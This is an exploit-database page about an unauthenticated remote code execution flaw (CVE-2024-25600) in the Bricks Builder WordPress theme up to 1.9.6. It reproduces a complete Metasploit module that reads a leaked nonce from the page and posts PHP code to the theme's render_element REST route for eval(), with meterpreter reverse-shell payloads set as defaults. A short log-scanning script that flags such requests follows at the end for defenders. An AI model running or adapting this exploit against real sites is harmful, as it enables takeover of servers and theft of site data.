The Exploit Database - CXSecurity.com, 5 July 2024
WordPress Bricks Builder Theme 1.9.6 Remote Code Execution

The vulnerability exists in the Bricks Builder theme for WordPress, versions 1.9.6 and below. An attacker can bypass authentication by exploiting a nonce leak and abuse the theme's use of eval() to execute arbitrary PHP code, gaining full control of the affected WordPress site. Upgrading to version 1.9.6.1 or later is recommended.

👨‍💻 The module exploits an unauthenticated remote code execution vulnerability in the Bricks Builder theme: the attacker bypasses authentication through a nonce leak and abuses the theme's use of eval() to execute arbitrary PHP code.

🔑 The nonce leak is the primary means by which an attacker bypasses authentication. A nonce is a randomly generated string used to validate the legitimacy of a request. An attacker can extract the nonce value by analyzing the site's JavaScript code and then use it to construct malicious requests.

📦 The Bricks Builder theme uses eval() to execute user-supplied code. By crafting a request that carries malicious code and sending it to the server, an attacker gets eval() to run that code.

🛡️ The impact is severe: an attacker who exploits the vulnerability gains full control of the affected WordPress site, including reading and modifying site data, uploading malicious files, and executing arbitrary code.

⚠️ To prevent exploitation, users should upgrade to the latest Bricks Builder theme version, 1.9.6.1 or later, as soon as possible.

🔒 In addition, users can take further measures to reduce risk, such as using strong passwords, regularly updating WordPress and its themes, and installing security plugins.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HTTP::Wordpress
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Unauthenticated RCE in Bricks Builder Theme',
        'Description' => %q{
          This module exploits an unauthenticated remote code execution vulnerability in the
          Bricks Builder Theme versions <= 1.9.6 for WordPress. The vulnerability allows attackers
          to execute arbitrary PHP code by leveraging a nonce leakage to bypass authentication and
          exploit the eval() function usage within the theme. Successful exploitation allows for full
          control of the affected WordPress site. It is recommended to upgrade to version 1.9.6.1 or higher.
        },
        'Author' => [
          'Calvin Alkan', # Vulnerability discovery
          'Valentin Lobstein' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2024-25600'],
          ['URL', 'https://github.com/Chocapikk/CVE-2024-25600'],
          ['URL', 'https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6'],
          ['WPVDB', 'afea4f8c-4d45-4cc0-8eb7-6fa6748158bd']
        ],
        'DisclosureDate' => '2024-02-19',
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'SideEffects' => [ IOC_IN_LOGS ],
          'Reliability' => [ REPEATABLE_SESSION ]
        },
        'Platform' => ['unix', 'linux', 'win', 'php'],
        'Arch' => [ARCH_PHP, ARCH_CMD],
        'Targets' => [
          [
            'PHP In-Memory',
            {
              'Platform' => 'php',
              'Arch' => ARCH_PHP,
              'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' },
              'Type' => :php_memory
            }
          ],
          [
            'Unix In-Memory',
            {
              'Platform' => ['unix', 'linux'],
              'Arch' => ARCH_CMD,
              'DefaultOptions' => { 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp' },
              'Type' => :unix_memory
            }
          ],
          [
            'Windows In-Memory',
            {
              'Platform' => 'win',
              'Arch' => ARCH_CMD,
              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp' },
              'Type' => :win_memory
            }
          ],
        ],
        'Privileged' => false
      )
    )
  end

  # The nonce is leaked to unauthenticated visitors inside the inline
  # "bricks-scripts-js-extra" script tag of a normal page load.
  def fetch_nonce
    uri = normalize_uri(target_uri.path)
    res = send_request_cgi('method' => 'GET', 'uri' => uri)
    return nil unless res&.code == 200

    script_tag_match = res.body.match(%r{<script id="bricks-scripts-js-extra"[^>]*>([\s\S]*?)</script>})
    return nil unless script_tag_match

    script_content = script_tag_match[1]
    nonce_match = script_content.match(/"nonce":"([a-f0-9]+)"/)
    nonce_match ? nonce_match[1] : nil
  end

  # Submits a "code" element to the render_element REST route; the theme
  # passes the element's "code" setting to eval() when executeCode is set.
  def exploit
    nonce = fetch_nonce
    fail_with(Failure::NoAccess, 'Failed to retrieve nonce. Exiting...') unless nonce

    print_good("Nonce retrieved: #{nonce}")
    send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'index.php'),
      'ctype' => 'application/json',
      'data' => {
        'postId' => rand(1..10000).to_s,
        'nonce' => nonce,
        'element' => {
          'name' => 'code',
          'settings' => {
            'executeCode' => 'true',
            'code' => "<?php #{payload_instance.arch.include?(ARCH_PHP) ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'))"} ?>"
          }
        }
      }.to_json,
      'vars_get' => {
        'rest_route' => '/bricks/v1/render_element'
      }
    )
  end

  # Version check against the theme's style.css: anything below 1.9.6.1 is reported as vulnerable.
  def check
    return CheckCode::Unknown('WordPress does not appear to be online.') unless wordpress_and_online?

    wp_version = wordpress_version
    print_status("WordPress Version: #{wp_version}") if wp_version

    theme_check_code = check_theme_version_from_style('bricks', '1.9.6.1')
    return CheckCode::Unknown('The Bricks Builder theme does not appear to be installed') unless theme_check_code
    return CheckCode::Detected('The Bricks Builder theme is running but the version was unable to be determined') if theme_check_code.code == 'detected'
    return CheckCode::Safe("The Bricks Builder is running version: #{theme_check_code.details[:version]}, which is not vulnerable.") unless theme_check_code.code == 'appears'

    theme_version = theme_check_code.details[:version]
    print_good("Detected Bricks Builder theme version: #{theme_version}")
    CheckCode::Appears
  end
end
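The module's notes flag IOC_IN_LOGS: every attempt is a POST to index.php with rest_route=/bricks/v1/render_element. As an added example (not code from the CXSecurity page or the Metasploit module), the Ruby script below flags such POSTs in constructed combined-format access-log lines so a defender can triage them. It assumes the standard /wp-json/ pretty-permalink form of the same route as a second spelling, which the page itself does not show.

```ruby
# Added example: flag POST requests to the Bricks render_element REST route
# in combined-format access logs (the endpoint the module above calls).
require 'uri'

# Combined log format: ip ident user [time] "METHOD path PROTO" status ...
LOG_LINE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3})/
TARGET_ROUTE = '/bricks/v1/render_element'

# REST route addressed by a request path, or nil if it is not a REST call.
# Covers the ?rest_route= query form used by the module and the /wp-json/
# pretty-permalink form (assumed; the page only shows the query form).
def rest_route_of(path)
  uri = URI.parse(path)
  return uri.path.delete_prefix('/wp-json') if uri.path.start_with?('/wp-json/')
  return nil unless uri.query

  URI.decode_www_form(uri.query).to_h['rest_route']
rescue URI::InvalidURIError, ArgumentError
  nil
end

# Hits as {ip:, time:, status:} for every POST aimed at TARGET_ROUTE,
# including rejected ones (4xx), since blocked attempts are still signal.
def find_render_element_hits(lines)
  lines.filter_map do |line|
    m = LOG_LINE.match(line)
    next unless m && m[:method] == 'POST'
    next unless rest_route_of(m[:path]) == TARGET_ROUTE

    { ip: m[:ip], time: m[:time], status: m[:status].to_i }
  end
end

# Constructed sample lines (not real traffic).
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [05/Jul/2024:10:01:02 +0000] "GET / HTTP/1.1" 200 51234 "-" "Mozilla/5.0"
  203.0.113.7 - - [05/Jul/2024:10:01:03 +0000] "POST /index.php?rest_route=%2Fbricks%2Fv1%2Frender_element HTTP/1.1" 200 812 "-" "Mozilla/5.0"
  198.51.100.4 - - [05/Jul/2024:10:05:00 +0000] "POST /wp-json/bricks/v1/render_element HTTP/1.1" 403 120 "-" "curl/8.4.0"
  192.0.2.9 - - [05/Jul/2024:10:06:00 +0000] "GET /wp-json/bricks/v1/render_element HTTP/1.1" 401 90 "-" "curl/8.4.0"
LOG

if __FILE__ == $PROGRAM_NAME
  find_render_element_hits(SAMPLE_LOG.lines).each do |h|
    puts "#{h[:time]} #{h[:ip]} POST #{TARGET_ROUTE} -> #{h[:status]}"
  end
end
```

A 200 on this route from a pre-1.9.6.1 install is the case worth treating as probable compromise; a GET or a non-matching route is not a hit.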
